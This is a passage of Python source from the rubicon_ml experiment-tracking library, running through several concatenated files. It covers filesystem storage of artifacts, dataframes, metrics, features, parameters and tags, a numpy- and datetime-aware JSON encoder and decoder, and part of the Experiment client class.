with ZipFile(zip_archive_filepath, "r") as curr_archive:
curr_archive.extractall(dest_experiments_dir)
else:
latest_zip_archive_filepath = None
latest_time = None
for zip_archive in self._ls(archive_dir):
zip_archive_filepath = os.path.join(archive_dir, zip_archive)
mod_time = self._modified(zip_archive_filepath)
if latest_time is None:
latest_time = mod_time
latest_zip_archive_filepath = zip_archive_filepath
elif mod_time > latest_time:
latest_zip_archive_filepath = zip_archive_filepath
latest_time = mod_time
with ZipFile(latest_zip_archive_filepath, "r") as zip_archive:
zip_archive.extractall(dest_experiments_dir)
if len(self._ls(dest_experiments_dir)) > og_num_experiments:
print("experiments read from archive")
else:
print("experiments not read from archive")
# ------- Artifacts --------
    def _get_artifact_metadata_root(self, project_name, experiment_id=None):
        """Returns the artifacts directory of the project with name
        `project_name` or experiment with ID `experiment_id`.
        """
        # Experiment-scoped artifacts nest under the experiment directory;
        # project-scoped artifacts live directly under the project.
        if experiment_id is not None:
            experiment_metadata_root = self._get_experiment_metadata_root(project_name)

            return f"{experiment_metadata_root}/{experiment_id}/artifacts"
        else:
            return f"{self.root_dir}/{slugify(project_name)}/artifacts"
    def _get_artifact_metadata_path(self, project_name, experiment_id, artifact_id):
        """Returns the path of the artifact with ID `artifact_id`'s
        metadata.
        """
        artifact_metadata_root = self._get_artifact_metadata_root(project_name, experiment_id)

        return f"{artifact_metadata_root}/{artifact_id}/metadata.json"
    def _get_artifact_data_path(self, project_name, experiment_id, artifact_id):
        """Returns the path of the artifact with ID `artifact_id`'s
        raw data.
        """
        artifact_metadata_root = self._get_artifact_metadata_root(project_name, experiment_id)

        return f"{artifact_metadata_root}/{artifact_id}/data"
def create_artifact(self, artifact, data, project_name, experiment_id=None):
"""Persist an artifact to the configured filesystem.
Parameters
----------
artifact : rubicon.domain.Artifact
The artifact to persist.
data : bytes
The raw data to persist as an artifact.
project_name : str
The name of the project this artifact belongs to.
experiment_id : str, optional
The ID of the experiment this artifact belongs to.
Artifacts do not need to belong to an experiment.
"""
artifact_metadata_path = self._get_artifact_metadata_path(
project_name, experiment_id, artifact.id
)
artifact_data_path = self._get_artifact_data_path(project_name, experiment_id, artifact.id)
self._persist_bytes(data, artifact_data_path)
self._persist_domain(artifact, artifact_metadata_path)
def get_artifact_metadata(self, project_name, artifact_id, experiment_id=None):
    """Retrieve an artifact's metadata from the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project the artifact with ID `artifact_id`
        is logged to.
    artifact_id : str
        The ID of the artifact to retrieve.
    experiment_id : str, optional
        The ID of the experiment the artifact is logged to, if any.
        Artifacts do not need to belong to an experiment.

    Returns
    -------
    rubicon.domain.Artifact
        The artifact with ID `artifact_id`.
    """
    metadata_path = self._get_artifact_metadata_path(project_name, experiment_id, artifact_id)
    metadata = self._read_domain(metadata_path, f"No artifact with id `{artifact_id}` found.")

    return domain.Artifact(**metadata)
def get_artifacts_metadata(self, project_name, experiment_id=None):
    """Retrieve the metadata of every artifact logged to the given
    project or experiment, ordered by creation time.

    Parameters
    ----------
    project_name : str
        The name of the project to retrieve all artifacts from.
    experiment_id : str, optional
        The ID of the experiment to retrieve all artifacts from.
        Artifacts do not need to belong to an experiment.

    Returns
    -------
    list of rubicon.domain.Artifact
        The artifacts logged to the specified object.
    """
    root = self._get_artifact_metadata_root(project_name, experiment_id)

    try:
        metadata_paths = self._ls_directories_only(root)
        artifacts = sorted(
            (domain.Artifact(**json.loads(metadata)) for metadata in self._cat_paths(metadata_paths)),
            key=lambda artifact: artifact.created_at,
        )
    except FileNotFoundError:
        # no artifacts directory means nothing has been logged yet
        artifacts = []

    return artifacts
def get_artifact_data(self, project_name, artifact_id, experiment_id=None):
    """Retrieve an artifact's raw data.

    Parameters
    ----------
    project_name : str
        The name of the project the artifact with ID `artifact_id`
        is logged to.
    artifact_id : str
        The ID of the artifact to retrieve data from.
    experiment_id : str, optional
        The ID of the experiment the artifact is logged to, if any.
        Artifacts do not need to belong to an experiment.

    Returns
    -------
    bytes
        The artifact with ID `artifact_id`'s raw data.
    """
    data_path = self._get_artifact_data_path(project_name, experiment_id, artifact_id)

    return self._read_bytes(data_path, f"No data for artifact with id `{artifact_id}` found.")
def delete_artifact(self, project_name, artifact_id, experiment_id=None):
    """Delete an artifact from the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project the artifact with ID `artifact_id`
        is logged to.
    artifact_id : str
        The ID of the artifact to delete.
    experiment_id : str, optional
        The ID of the experiment the artifact is logged to, if any.
        Artifacts do not need to belong to an experiment.

    Raises
    ------
    RubiconException
        If no artifact with ID `artifact_id` exists.
    """
    artifact_metadata_root = self._get_artifact_metadata_root(project_name, experiment_id)

    try:
        self._rm(f"{artifact_metadata_root}/{artifact_id}")
    except FileNotFoundError as err:
        # chain the original error so the missing path is not hidden from debuggers
        raise RubiconException(f"No artifact with id `{artifact_id}` found.") from err
# ------- Dataframes -------
def _get_dataframe_metadata_root(self, project_name, experiment_id=None):
    """Return the dataframes directory for the project named
    `project_name`, or for the experiment `experiment_id` within
    that project when one is given.
    """
    if experiment_id is None:
        return f"{self.root_dir}/{slugify(project_name)}/dataframes"

    experiment_metadata_root = self._get_experiment_metadata_root(project_name)

    return f"{experiment_metadata_root}/{experiment_id}/dataframes"
def _get_dataframe_metadata_path(self, project_name, experiment_id, dataframe_id):
    """Return the path of the metadata JSON for the dataframe with
    ID `dataframe_id`.
    """
    root = self._get_dataframe_metadata_root(project_name, experiment_id)

    return f"{root}/{dataframe_id}/metadata.json"
def _get_dataframe_data_path(self, project_name, experiment_id, dataframe_id):
    """Return the path of the raw data directory for the dataframe
    with ID `dataframe_id`.
    """
    root = self._get_dataframe_metadata_root(project_name, experiment_id)

    return f"{root}/{dataframe_id}/data"
def _persist_dataframe(self, df, path):
    """Persist the dataframe `df` under `path` on the configured
    filesystem.

    Note
    ----
    `dask` dataframes are written by `dask.dataframe.to_parquet`,
    which automatically splits them into chunks. `pandas`
    dataframes are saved as a single file with the hope that users
    would leverage dask for large dataframes.
    """
    if isinstance(df, pd.DataFrame):
        # pandas writes one file inside the dataframe's directory;
        # dask manages its own output directory
        self._mkdir(path)
        path = f"{path}/data.parquet"

    df.to_parquet(path, engine="pyarrow")
def _read_dataframe(self, path, df_type="pandas"):
    """Read a dataframe of type `df_type` from `path` on the
    configured filesystem.
    """
    acceptable_types = ["pandas", "dask"]

    if df_type not in acceptable_types:
        raise ValueError(f"`df_type` must be one of {acceptable_types}")

    if df_type == "pandas":
        # pandas dataframes are stored as a single parquet file
        return pd.read_parquet(f"{path}/data.parquet", engine="pyarrow")

    # dask is an optional dependency, so import it lazily
    try:
        from dask import dataframe as dd
    except ImportError:
        raise RubiconException(
            "`rubicon_ml` requires `dask` to be installed in the current environment "
            "to read dataframes with `df_type`='dask'. `pip install dask[dataframe]` "
            "or `conda install dask` to continue."
        )

    return dd.read_parquet(path, engine="pyarrow")
def create_dataframe(self, dataframe, data, project_name, experiment_id=None):
    """Persist a dataframe to the configured filesystem.

    Parameters
    ----------
    dataframe : rubicon.domain.Dataframe
        The dataframe to persist.
    data : dask.dataframe.DataFrame or pandas.DataFrame
        The raw data to persist as a dataframe.
    project_name : str
        The name of the project this dataframe belongs to.
    experiment_id : str, optional
        The ID of the experiment this dataframe belongs to, if any.
        Dataframes do not need to belong to an experiment.
    """
    metadata_path = self._get_dataframe_metadata_path(project_name, experiment_id, dataframe.id)
    data_path = self._get_dataframe_data_path(project_name, experiment_id, dataframe.id)

    # write the raw data first, then the metadata that points at it
    self._persist_dataframe(data, data_path)
    self._persist_domain(dataframe, metadata_path)
def get_dataframe_metadata(self, project_name, dataframe_id, experiment_id=None):
    """Retrieve a dataframe's metadata from the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project the dataframe with ID
        `dataframe_id` is logged to.
    dataframe_id : str
        The ID of the dataframe to retrieve.
    experiment_id : str, optional
        The ID of the experiment the dataframe is logged to, if
        any. Dataframes do not need to belong to an experiment.

    Returns
    -------
    rubicon.domain.Dataframe
        The dataframe with ID `dataframe_id`.
    """
    metadata_path = self._get_dataframe_metadata_path(project_name, experiment_id, dataframe_id)
    metadata = self._read_domain(metadata_path, f"No dataframe with id `{dataframe_id}` found.")

    return domain.Dataframe(**metadata)
def get_dataframes_metadata(self, project_name, experiment_id=None):
    """Retrieve the metadata of every dataframe logged to the given
    project or experiment, ordered by creation time.

    Parameters
    ----------
    project_name : str
        The name of the project to retrieve all dataframes from.
    experiment_id : str, optional
        The ID of the experiment to retrieve all dataframes from.
        Dataframes do not need to belong to an experiment.

    Returns
    -------
    list of rubicon.domain.Dataframe
        The dataframes logged to the specified object.
    """
    root = self._get_dataframe_metadata_root(project_name, experiment_id)

    try:
        metadata_paths = self._ls_directories_only(root)
        dataframes = sorted(
            (domain.Dataframe(**json.loads(metadata)) for metadata in self._cat_paths(metadata_paths)),
            key=lambda dataframe: dataframe.created_at,
        )
    except FileNotFoundError:
        # no dataframes directory means nothing has been logged yet
        dataframes = []

    return dataframes
def get_dataframe_data(self, project_name, dataframe_id, experiment_id=None, df_type="pandas"):
    """Retrieve a dataframe's raw data.

    Parameters
    ----------
    project_name : str
        The name of the project the dataframe with ID
        `dataframe_id` is logged to.
    dataframe_id : str
        The ID of the dataframe to retrieve data from.
    experiment_id : str, optional
        The ID of the experiment the dataframe with ID
        `dataframe_id` is logged to. Dataframes do not
        need to belong to an experiment.
    df_type : str, optional
        The type of dataframe. Can be either `pandas` or `dask`.
        Defaults to `pandas`.

    Returns
    -------
    pandas.DataFrame or dask.dataframe.DataFrame
        The dataframe with ID `dataframe_id`'s raw data.
    """
    dataframe_data_path = self._get_dataframe_data_path(project_name, experiment_id, dataframe_id)

    try:
        df = self._read_dataframe(dataframe_data_path, df_type)
    except FileNotFoundError as err:
        # chain the original error so the missing path is not hidden
        raise RubiconException(
            f"No data for dataframe with id `{dataframe_id}` found. This might have "
            "happened if you forgot to set `df_type='dask'` when trying to read a `dask` dataframe."
        ) from err

    return df
def delete_dataframe(self, project_name, dataframe_id, experiment_id=None):
    """Delete a dataframe from the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project the dataframe with ID
        `dataframe_id` is logged to.
    dataframe_id : str
        The ID of the dataframe to delete.
    experiment_id : str, optional
        The ID of the experiment the dataframe with ID
        `dataframe_id` is logged to. Dataframes do not
        need to belong to an experiment.

    Raises
    ------
    RubiconException
        If no dataframe with ID `dataframe_id` exists.
    """
    dataframe_metadata_root = self._get_dataframe_metadata_root(project_name, experiment_id)

    try:
        self._rm(f"{dataframe_metadata_root}/{dataframe_id}")
    except FileNotFoundError as err:
        # chain the original error so the missing path is not hidden
        raise RubiconException(f"No dataframe with id `{dataframe_id}` found.") from err
# -------- Features --------
def _get_feature_metadata_root(self, project_name, experiment_id):
    """Return the features directory of the experiment with ID
    `experiment_id`.
    """
    experiment_metadata_root = self._get_experiment_metadata_root(project_name)

    return f"{experiment_metadata_root}/{experiment_id}/features"
def _get_feature_metadata_path(self, project_name, experiment_id, feature_name):
    """Return the path of the metadata JSON for the feature named
    `feature_name`. Names are slugified for filesystem safety.
    """
    root = self._get_feature_metadata_root(project_name, experiment_id)

    return f"{root}/{slugify(feature_name)}/metadata.json"
def create_feature(self, feature, project_name, experiment_id):
    """Persist a feature to the configured filesystem.

    Parameters
    ----------
    feature : rubicon.domain.Feature
        The feature to persist.
    project_name : str
        The name of the project the experiment with ID
        `experiment_id` is logged to.
    experiment_id : str
        The ID of the experiment this feature belongs to.

    Raises
    ------
    RubiconException
        If a feature named `feature.name` is already logged to the
        experiment.
    """
    feature_metadata_path = self._get_feature_metadata_path(project_name, experiment_id, feature.name)

    # feature names are unique within an experiment
    if self._exists(feature_metadata_path):
        raise RubiconException(f"A feature with name '{feature.name}' already exists.")

    self._persist_domain(feature, feature_metadata_path)
def get_feature(self, project_name, experiment_id, feature_name):
    """Retrieve a feature from the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project the experiment with ID
        `experiment_id` is logged to.
    experiment_id : str
        The ID of the experiment the feature named `feature_name`
        is logged to.
    feature_name : str
        The name of the feature to retrieve.

    Returns
    -------
    rubicon.domain.Feature
        The feature with name `feature_name`.
    """
    metadata_path = self._get_feature_metadata_path(project_name, experiment_id, feature_name)
    metadata = self._read_domain(metadata_path, f"No feature with name '{feature_name}' found.")

    return domain.Feature(**metadata)
def get_features(self, project_name, experiment_id):
    """Retrieve every feature logged to the experiment with ID
    `experiment_id`, ordered by creation time.

    Parameters
    ----------
    project_name : str
        The name of the project the experiment with ID
        `experiment_id` is logged to.
    experiment_id : str
        The ID of the experiment to retrieve all features from.

    Returns
    -------
    list of rubicon.domain.Feature
        The features logged to the experiment with ID
        `experiment_id`.
    """
    root = self._get_feature_metadata_root(project_name, experiment_id)

    try:
        metadata_paths = self._ls_directories_only(root)
        features = sorted(
            (domain.Feature(**json.loads(metadata)) for metadata in self._cat_paths(metadata_paths)),
            key=lambda feature: feature.created_at,
        )
    except FileNotFoundError:
        # no features directory means nothing has been logged yet
        features = []

    return features
# -------- Metrics ---------
def _get_metric_metadata_root(self, project_name, experiment_id):
    """Return the metrics directory of the experiment with ID
    `experiment_id`.
    """
    experiment_metadata_root = self._get_experiment_metadata_root(project_name)

    return f"{experiment_metadata_root}/{experiment_id}/metrics"
def _get_metric_metadata_path(self, project_name, experiment_id, metric_name):
    """Return the path of the metadata JSON for the metric named
    `metric_name`. Names are slugified for filesystem safety.
    """
    root = self._get_metric_metadata_root(project_name, experiment_id)

    return f"{root}/{slugify(metric_name)}/metadata.json"
def create_metric(self, metric, project_name, experiment_id):
    """Persist a metric to the configured filesystem.

    Parameters
    ----------
    metric : rubicon.domain.Metric
        The metric to persist.
    project_name : str
        The name of the project the experiment with ID
        `experiment_id` is logged to.
    experiment_id : str
        The ID of the experiment this metric belongs to.

    Raises
    ------
    RubiconException
        If a metric named `metric.name` is already logged to the
        experiment.
    """
    metric_metadata_path = self._get_metric_metadata_path(project_name, experiment_id, metric.name)

    # metric names are unique within an experiment
    if self._exists(metric_metadata_path):
        raise RubiconException(f"A metric with name '{metric.name}' already exists.")

    self._persist_domain(metric, metric_metadata_path)
def get_metric(self, project_name, experiment_id, metric_name):
    """Retrieve a metric from the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project the experiment with ID
        `experiment_id` is logged to.
    experiment_id : str
        The ID of the experiment the metric named `metric_name`
        is logged to.
    metric_name : str
        The name of the metric to retrieve.

    Returns
    -------
    rubicon.domain.Metric
        The metric with name `metric_name`.
    """
    metadata_path = self._get_metric_metadata_path(project_name, experiment_id, metric_name)
    metadata = self._read_domain(metadata_path, f"No metric with name '{metric_name}' found.")

    return domain.Metric(**metadata)
def get_metrics(self, project_name, experiment_id):
    """Retrieve every metric logged to the experiment with ID
    `experiment_id`, ordered by creation time.

    Parameters
    ----------
    project_name : str
        The name of the project the experiment with ID
        `experiment_id` is logged to.
    experiment_id : str
        The ID of the experiment to retrieve all metrics from.

    Returns
    -------
    list of rubicon.domain.Metric
        The metrics logged to the experiment with ID
        `experiment_id`.
    """
    root = self._get_metric_metadata_root(project_name, experiment_id)

    try:
        metadata_paths = self._ls_directories_only(root)
        metrics = sorted(
            (domain.Metric(**json.loads(metadata)) for metadata in self._cat_paths(metadata_paths)),
            key=lambda metric: metric.created_at,
        )
    except FileNotFoundError:
        # no metrics directory means nothing has been logged yet
        metrics = []

    return metrics
# ------- Parameters -------
def _get_parameter_metadata_root(self, project_name, experiment_id):
    """Return the parameters directory of the experiment with ID
    `experiment_id`.
    """
    experiment_metadata_root = self._get_experiment_metadata_root(project_name)

    return f"{experiment_metadata_root}/{experiment_id}/parameters"
def _get_parameter_metadata_path(self, project_name, experiment_id, parameter_name):
    """Return the path of the metadata JSON for the parameter named
    `parameter_name`. Names are slugified for filesystem safety.
    """
    root = self._get_parameter_metadata_root(project_name, experiment_id)

    return f"{root}/{slugify(parameter_name)}/metadata.json"
def create_parameter(self, parameter, project_name, experiment_id):
    """Persist a parameter to the configured filesystem.

    Parameters
    ----------
    parameter : rubicon.domain.Parameter
        The parameter to persist.
    project_name : str
        The name of the project the experiment with ID
        `experiment_id` is logged to.
    experiment_id : str
        The ID of the experiment this parameter belongs to.

    Raises
    ------
    RubiconException
        If a parameter named `parameter.name` is already logged to
        the experiment.
    """
    parameter_metadata_path = self._get_parameter_metadata_path(
        project_name, experiment_id, parameter.name
    )

    # parameter names are unique within an experiment
    if self._exists(parameter_metadata_path):
        raise RubiconException(f"A parameter with name '{parameter.name}' already exists.")

    self._persist_domain(parameter, parameter_metadata_path)
def get_parameter(self, project_name, experiment_id, parameter_name):
    """Retrieve a parameter from the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project this parameter belongs to.
    experiment_id : str
        The ID of the experiment the parameter named
        `parameter_name` is logged to.
    parameter_name : str
        The name of the parameter to retrieve.

    Returns
    -------
    rubicon.domain.Parameter
        The parameter with name `parameter_name`.
    """
    metadata_path = self._get_parameter_metadata_path(project_name, experiment_id, parameter_name)
    metadata = self._read_domain(metadata_path, f"No parameter with name '{parameter_name}' found.")

    return domain.Parameter(**metadata)
def get_parameters(self, project_name, experiment_id):
    """Retrieve every parameter logged to the experiment with ID
    `experiment_id`, ordered by creation time.

    Parameters
    ----------
    project_name : str
        The name of the project the experiment with ID
        `experiment_id` is logged to.
    experiment_id : str
        The ID of the experiment to retrieve all parameters from.

    Returns
    -------
    list of rubicon.domain.Parameter
        The parameters logged to the experiment with ID
        `experiment_id`.
    """
    root = self._get_parameter_metadata_root(project_name, experiment_id)

    try:
        metadata_paths = self._ls_directories_only(root)
        parameters = sorted(
            (domain.Parameter(**json.loads(metadata)) for metadata in self._cat_paths(metadata_paths)),
            key=lambda parameter: parameter.created_at,
        )
    except FileNotFoundError:
        # no parameters directory means nothing has been logged yet
        parameters = []

    return parameters
# ---------- Tags ----------
def _get_tag_metadata_root(
    self, project_name, experiment_id=None, entity_identifier=None, entity_type=None
):
    """Returns the directory to write tags to.

    Raises
    ------
    ValueError
        If `entity_type` is not one of the taggable entity type
        names, which occurs when neither an `experiment_id` nor an
        `entity_identifier` was provided by the caller.
    """
    get_metadata_root_lookup = {
        "Artifact": self._get_artifact_metadata_root,
        "Dataframe": self._get_dataframe_metadata_root,
        "Experiment": self._get_experiment_metadata_root,
        "Metric": self._get_metric_metadata_root,
        "Feature": self._get_feature_metadata_root,
        "Parameter": self._get_parameter_metadata_root,
    }

    try:
        get_metadata_root = get_metadata_root_lookup[entity_type]
    except KeyError as err:
        # chain the lookup error so the unexpected `entity_type` is visible
        raise ValueError("`experiment_id` and `entity_identifier` can not both be `None`.") from err

    if entity_type == "Experiment":
        experiment_metadata_root = get_metadata_root(project_name)

        return f"{experiment_metadata_root}/{experiment_id}"
    else:
        entity_metadata_root = get_metadata_root(project_name, experiment_id)

        # We want to slugify the names of Metrics, Features, and Parameters-
        # not Artifacts, Dataframes, or Experiments, which are keyed by ID
        if entity_type in ["Metric", "Feature", "Parameter"]:
            entity_identifier = slugify(entity_identifier)

        return f"{entity_metadata_root}/{entity_identifier}"
def add_tags(
    self, project_name, tags, experiment_id=None, entity_identifier=None, entity_type=None
):
    """Persist tags to the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project the object to tag belongs to.
    tags : list of str
        The tag values to persist.
    experiment_id : str, optional
        The ID of the experiment to apply the tags `tags` to.
    entity_identifier : str, optional
        The ID or name of the entity to apply the tags `tags` to.
    entity_type : str, optional
        The name of the entity's type as returned by
        `entity_cls.__class__.__name__`.
    """
    tag_metadata_root = self._get_tag_metadata_root(
        project_name, experiment_id, entity_identifier, entity_type
    )

    # each tag change gets its own uniquely named file so writes never collide
    tag_metadata_path = f"{tag_metadata_root}/tags_{domain.utils.uuid.uuid4()}.json"

    self._persist_domain({"added_tags": tags}, tag_metadata_path)
def remove_tags(
    self, project_name, tags, experiment_id=None, entity_identifier=None, entity_type=None
):
    """Delete tags from the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project the object to delete tags from
        belongs to.
    tags : list of str
        The tag values to delete.
    experiment_id : str, optional
        The ID of the experiment to delete the tags `tags` from.
    entity_identifier : str, optional
        The ID or name of the entity to delete the tags `tags` from.
    entity_type : str, optional
        The name of the entity's type as returned by
        `entity_cls.__class__.__name__`.
    """
    tag_metadata_root = self._get_tag_metadata_root(
        project_name, experiment_id, entity_identifier, entity_type
    )

    # removals are recorded as their own files and replayed in order by `get_tags`
    tag_metadata_path = f"{tag_metadata_root}/tags_{domain.utils.uuid.uuid4()}.json"

    self._persist_domain({"removed_tags": tags}, tag_metadata_path)
def _sort_tag_paths(self, tag_paths):
    """Return `(timestamp, name)` pairs for the path info in
    `tag_paths`, ordered from oldest to newest.
    """
    # some filesystems return a dict of path info keyed by path
    if isinstance(tag_paths, dict):
        tag_paths = tag_paths.values()

    # "created" is reported by some backends, "LastModified" by others
    timestamped_paths = [
        (info.get("created", info.get("LastModified")), info.get("name")) for info in tag_paths
    ]
    timestamped_paths.sort()

    return timestamped_paths
def get_tags(self, project_name, experiment_id=None, entity_identifier=None, entity_type=None):
    """Retrieve tags from the configured filesystem.

    Parameters
    ----------
    project_name : str
        The name of the project the object to retrieve tags from
        belongs to.
    experiment_id : str, optional
        The ID of the experiment to retrieve tags from.
    entity_identifier : str, optional
        The ID or name of the entity to retrieve tags from.
    entity_type : str, optional
        The name of the entity's type as returned by
        `entity_cls.__class__.__name__`.

    Returns
    -------
    list of dict
        A list of dictionaries with one key each, `added_tags` or
        `removed_tags`, whose value is a list of tag names that
        have been added to or removed from the specified object,
        ordered oldest change first.
    """
    tag_metadata_root = self._get_tag_metadata_root(
        project_name, experiment_id, entity_identifier, entity_type
    )
    tag_paths = self._glob(f"{tag_metadata_root}/tags_*.json")

    if len(tag_paths) == 0:
        return []

    sorted_tag_paths = self._sort_tag_paths(tag_paths)

    # fetch every tag file at once, then replay them in chronological order
    tag_data = self._cat([path for _, path in sorted_tag_paths])

    return [json.loads(tag_data[path]) for _, path in sorted_tag_paths]
import dataclasses
import json
from base64 import b64decode, b64encode
from datetime import date, datetime
import numpy as np
from rubicon_ml.domain.utils import TrainingMetadata
class DomainJSONEncoder(json.JSONEncoder):
    """JSON encoder aware of the extra types carried by rubicon
    domain models: datetimes, dates, sets, training metadata, numpy
    values, and dataclasses. Each is serialized as a `_type`-tagged
    JSON object.
    """

    def default(self, obj):
        """Encode `obj` as a tagged, JSON-serializable value.

        Note - if we need to support nested objects
        within dataclasses, we need to leverage asdict()
        """
        # `datetime` must be checked before `date` - it is a subclass
        if isinstance(obj, datetime):
            return {"_type": "datetime", "value": obj.strftime("%Y-%m-%d %H:%M:%S.%f")}

        if isinstance(obj, date):
            return {"_type": "date", "value": obj.isoformat()}

        if isinstance(obj, set):
            return {"_type": "set", "value": list(obj)}

        if isinstance(obj, TrainingMetadata):
            return {"_type": "training_metadata", "value": obj.training_metadata}

        if isinstance(obj, (np.generic, np.ndarray)):
            # raw bytes are base64-encoded so the payload stays valid JSON text
            return {
                "_type": "numpy",
                "_dtype": np.lib.format.dtype_to_descr(obj.dtype),
                "_shape": obj.shape,
                "value": b64encode(obj.tobytes()).decode(),
            }

        if dataclasses.is_dataclass(obj):
            return obj.__dict__

        return super().default(obj)  # pragma: no cover
class DomainJSONDecoder(json.JSONDecoder):
    """JSON decoder that recognizes the `_type`-tagged objects
    produced by the domain encoder and rebuilds the original Python
    values. Untagged objects pass through unchanged.
    """

    def __init__(self, *args, **kwargs):
        json.JSONDecoder.__init__(self, object_hook=self.object_hook, *args, **kwargs)

    def object_hook(self, obj):
        """Rebuild the Python value for a decoded JSON object."""
        obj_type = obj.get("_type")

        if obj_type == "datetime":
            return datetime.strptime(obj.get("value"), "%Y-%m-%d %H:%M:%S.%f")
        if obj_type == "date":
            return date.fromisoformat(obj.get("value"))
        if obj_type == "set":
            return set(obj.get("value"))
        if obj_type == "training_metadata":
            return TrainingMetadata([(*o,) for o in obj.get("value")])
        if obj_type == "numpy":
            dtype = np.lib.format.descr_to_dtype(obj.get("_dtype"))
            shape = obj.get("_shape")
            value = np.frombuffer(b64decode(obj.get("value")), dtype)

            # scalars are stored with an empty shape
            return value.reshape(shape) if shape else value[0]

        return obj
def dump(data, open_file, **kwargs):
    """Serialize `data` as JSON into the open file object `open_file`
    using the domain-aware `DomainJSONEncoder`.
    """
    return json.dump(data, open_file, cls=DomainJSONEncoder, **kwargs)
def dumps(data, **kwargs):
    """Serialize `data` to a JSON string using the domain-aware
    `DomainJSONEncoder`.
    """
    return json.dumps(data, cls=DomainJSONEncoder, **kwargs)
def load(open_file, **kwargs):
    """Deserialize JSON from the open file object `open_file` using
    the domain-aware `DomainJSONDecoder`.
    """
    return json.load(open_file, cls=DomainJSONDecoder, **kwargs)
def loads(data, **kwargs):
    """Deserialize the JSON string `data` using the domain-aware
    `DomainJSONDecoder`.
    """
    return json.loads(data, cls=DomainJSONDecoder, **kwargs)
from rubicon_ml import domain
from rubicon_ml.client import (
ArtifactMixin,
Base,
DataframeMixin,
Feature,
Metric,
Parameter,
TagMixin,
)
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.client.utils.tags import filter_children
from rubicon_ml.exceptions import RubiconException
class Experiment(Base, ArtifactMixin, DataframeMixin, TagMixin):
"""A client experiment.
An `experiment` represents a model run and is identified by
its 'created_at' time. It can have `metrics`, `parameters`,
`features`, `dataframes`, and `artifacts` logged to it.
An `experiment` is logged to a `project`.
Parameters
----------
domain : rubicon.domain.Experiment
The experiment domain model.
parent : rubicon.client.Project
The project that the experiment is logged to.
"""
def __init__(self, domain, parent):
    super().__init__(domain, parent._config)
    # the project this experiment is logged to
    self._parent = parent
    # per-entity caches, populated by the corresponding accessor methods
    self._artifacts = []
    self._dataframes = []
    self._metrics = []
    self._features = []
    self._parameters = []
def _get_identifiers(self):
    """Return the (project name, experiment ID) pair identifying
    this experiment in the backing repositories.
    """
    return self.project.name, self.id
@failsafe
def log_metric(self, name, value, directionality="score", description=None, tags=None):
    """Create a metric under the experiment.

    Parameters
    ----------
    name : str
        The metric's name.
    value : float
        The metric's value.
    directionality : str, optional
        The metric's directionality. Must be one of
        ["score", "loss"], where "score" represents
        a metric to maximize, while "loss" represents a
        metric to minimize. Defaults to "score".
    description : str, optional
        The metric's description. Use to provide additional
        context.
    tags : list of str, optional
        Values to tag the metric with. Use tags to organize and
        filter your metrics.

    Returns
    -------
    rubicon.client.Metric
        The created metric.
    """
    # use `None` as the default to avoid the shared mutable default argument
    if tags is None:
        tags = []
    if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
        raise ValueError("`tags` must be `list` of type `str`")

    metric = domain.Metric(
        name, value, directionality=directionality, description=description, tags=tags
    )

    for repo in self.repositories:
        repo.create_metric(metric, self.project.name, self.id)

    return Metric(metric, self)
@failsafe
def metrics(self, name=None, tags=[], qtype="or"):
    """Get the metrics logged to this experiment.

    Parameters
    ----------
    name : str, optional
        The name value to filter results on.
    tags : list of str, optional
        The tag values to filter results on.
    qtype : str, optional
        The query type to filter results on. Can be 'or' or
        'and'. Defaults to 'or'.

    Returns
    -------
    list of rubicon.client.Metric
        The metrics previously logged to this experiment.
    """
    failure = None

    # fall through to the next repository only when the current one errors
    for repo in self.repositories:
        try:
            retrieved = [
                Metric(metric, self) for metric in repo.get_metrics(self.project.name, self.id)
            ]
        except Exception as err:
            failure = err

            continue

        self._metrics = filter_children(retrieved, tags, qtype, name)

        return self._metrics

    raise RubiconException("all configured storage backends failed") from failure
@failsafe
def metric(self, name=None, id=None):
    """Get a metric.

    Parameters
    ----------
    name : str, optional
        The name of the metric to get.
    id : str, optional
        The id of the metric to get.

    Returns
    -------
    rubicon.client.Metric
        The metric with name `name` or id `id`.
    """
    if (name is None and id is None) or (name is not None and id is not None):
        raise ValueError("`name` OR `id` required.")

    if name is not None:
        return_err = None

        for repo in self.repositories:
            try:
                metric = repo.get_metric(self.project.name, self.id, name)
            except Exception as err:
                return_err = err
            else:
                return Metric(metric, self)

        raise RubiconException("all configured storage backends failed") from return_err
    else:
        # raise a clear error instead of an opaque `IndexError` on a miss
        matches = [m for m in self.metrics() if m.id == id]
        if not matches:
            raise RubiconException(f"No metric with id `{id}` found.")

        return matches[0]
@failsafe
def log_feature(self, name, description=None, importance=None, tags=None):
    """Create a feature under the experiment.

    Parameters
    ----------
    name : str
        The features's name.
    description : str
        The feature's description. Use to provide
        additional context.
    importance : float
        The feature's importance.
    tags : list of str, optional
        Values to tag the feature with. Use tags to organize and
        filter your features.

    Returns
    -------
    rubicon.client.Feature
        The created feature.
    """
    # use `None` as the default to avoid the shared mutable default argument
    if tags is None:
        tags = []
    if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
        raise ValueError("`tags` must be `list` of type `str`")

    feature = domain.Feature(name, description=description, importance=importance, tags=tags)

    for repo in self.repositories:
        repo.create_feature(feature, self.project.name, self.id)

    return Feature(feature, self)
@failsafe
def features(self, name=None, tags=[], qtype="or"):
    """Get the features logged to this experiment.

    Parameters
    ----------
    name : str, optional
        The name value to filter results on.
    tags : list of str, optional
        The tag values to filter results on.
    qtype : str, optional
        The query type to filter results on. Can be 'or' or
        'and'. Defaults to 'or'.

    Returns
    -------
    list of rubicon.client.Feature
        The features previously logged to this experiment.
    """
    failure = None

    # fall through to the next repository only when the current one errors
    for repo in self.repositories:
        try:
            retrieved = [
                Feature(feature, self) for feature in repo.get_features(self.project.name, self.id)
            ]
        except Exception as err:
            failure = err

            continue

        self._features = filter_children(retrieved, tags, qtype, name)

        return self._features

    raise RubiconException("all configured storage backends failed") from failure
@failsafe
def feature(self, name=None, id=None):
    """Get a feature.

    Parameters
    ----------
    name : str, optional
        The name of the feature to get.
